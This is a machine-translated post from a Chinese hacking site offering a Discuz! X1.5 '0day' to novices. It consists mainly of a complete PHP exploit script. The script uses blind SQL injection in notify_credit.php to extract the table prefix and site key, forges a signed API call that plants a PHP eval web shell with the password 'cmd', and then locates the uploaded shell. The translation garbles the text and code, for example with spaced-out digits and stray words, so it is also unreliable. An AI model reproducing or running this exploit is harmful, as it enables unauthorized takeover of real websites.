Discuz! X1. 5 0day exploit method-vulnerability warning-the black bar safety net

2011-06-03T00:00:00
ID MYHACK58:62201130704
Type myhack58
Reporter 佚名
Modified 2011-06-03T00:00:00

Description

Has been Discuz it! x1. 5 the site is difficult to invasion to take the shell for the novice to

0day is probably out today.

Teach everyone to use, on the map:

!

! this step requires time and the like.

See the following figures found?

!

Get to the chopper is connected.

!

I believe we will. Just for everyone to learn.

Don't know QQ 2 8 3 4 2 2 1 3 5 together with the discussion

Method of use 把 下面 内容 保存 为 exp.php in the php environment to run php exp.php http://www.hack6.com

<? php print_r(' +---------------------------------------------------------------------------+ Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by the follow-up getshell add the code down +---------------------------------------------------------------------------+ '); if ($argc < 2) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$ argv[0].' url [pre] Example: php '.$ argv[0].' http://localhost/ php '.$ argv[0].' http://localhost/ xss +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $url = $argv[1]; $pre = $argv[2]?$ argv[2]:'pre'; $target = parse_url($url); extract($target); $path1 = $path . '/api/trade/notify_credit.php'; $hash = array(); $hash = the array_merge($hash, range(4 8, 5 7)); $hash = the array_merge($hash, range(9 7, 1 0 2));

$tmp_expstr = "'"; $res = send(); if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops. I can NOT hack it.');} preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match); if($match[1])$pre = $match[1]; $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE "='"; $res = send(); if(strpos($res,"doesn't exist")!== false){ echo "Table_pre is WRONG!\ nReady to Crack It. Please Waiting..\n"; for($i = 1;$i<2 0;$i++){ $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',"))=$i AND "='"; $res = send();

if(strpos($res,'SQL syntax')!== false){

$pre = "; $hash2 = array(); $hash2 = array_merge($hash2, range(4 8, 5 7)); $hash2 = array_merge($hash2, range(9 7, 1 2 2)); $hash2[] = 9 5; for($j = 1;$j <= $i; $j++){ for ($k = 0; $k <= 2 5 5; $k++) { if(in_array($k, $hash2)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',"),$j,1)=0x{$char} AND "='"; $res = send(); if(strpos($res,'SQL syntax')!== false){ echo chr($k); $pre .= chr($k);break; } } } } if(strlen($pre)){echo "\nCracked...Table_Pre:".$ pre."\ n";break;}else{die('GET Table_pre Failed..');}; } } }; echo "Please Waiting....\ n"; $sitekey = "; for($i = 1;$i <= 3 2; $i++){ for ($k = 0; $k <= 2 5 5; $k++) { if(in_array($k, $hash)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND "='"; $res = send(); if(strpos($res,'SQL syntax')!== false){ echo chr($k); $sitekey .= chr($k);break; }}}} / By: alibaba Modify and add some code, and if successful will be able to get the shell The word secret is : cmd / if(strlen($sitekey)!= 3 2) { echo "\nmy_sitekey not found. try blank my_sitekey\n"; } else echo "\nmy_sitekey:{$sitekey}\n";

echo "\nUploading Shell..."; $module = 'video'; $method = 'authauth'; $params = 'a:3:{i:0;i:1;i:1;s:3 6:"PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7pz4=";i:2;s:3:"php";}'; $sign = md5($module . '|' . $method . '|' . $params . '|' . $sitekey); $data = "module=$module&method=$method&params=$params&sign=$sign"; $path2 = $path . "/api/manyou/my.php"; POST($host,8 0,$path2,$data,3 0);

echo "\nGetting Shell Location...\n"; $file = "; for($i = 1;$i <= 3 2; $i++){ for ($k = 0; $k <= 2 5 5; $k++) { if(in_array($k, $hash)) { $char = dechex($k); $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_member_field_home WHERE uid=1 AND MID(videophoto,{$i},1)=0x{$char} AND "='"; $res = send(); if(strpos($res,'SQL syntax')!== false){ echo chr($k); $file .= chr($k);break; } } } } echo "\nShell: $host$path/data/avatar/". substr($file,0,1) . "/" . substr($file,1,1) . "/$file.php"; exit;

function sign($exp_str){ return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key="); }

function send(){ global $host, $path1, $tmp_expstr;

$expdata = "attach=tenpay&retcode=0&trade_no=%2 5 2 7&mch_vno=". urlencode(urlencode($tmp_expstr))."& amp;sign=". sign($tmp_expstr); return POST($host,8 0,$path1,$expdata,3 0); }

function POST($host,$port,$path,$data,$timeout, $the cookie=") { $buffer=";

$fp = fsockopen($host,$port,$errno,$errstr,$timeout); if(!$ fp) die($host.'/'.$ path.' : '.$ errstr.$ errno); else { fputs($fp, "POST $path HTTP/1.0\r\n"); fputs($fp, "Host: $host\r\n"); fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n"); fputs($fp, "Content-length: ". strlen($data)."\ r\n"); fputs($fp, "Connection: close\r\n\r\n"); fputs($fp, $data."\ r\n\r\n");

while(! feof($fp)) { $buffer .= fgets($fp,4 0 9 6); }

fclose($fp); } return $buffer; } ?& gt;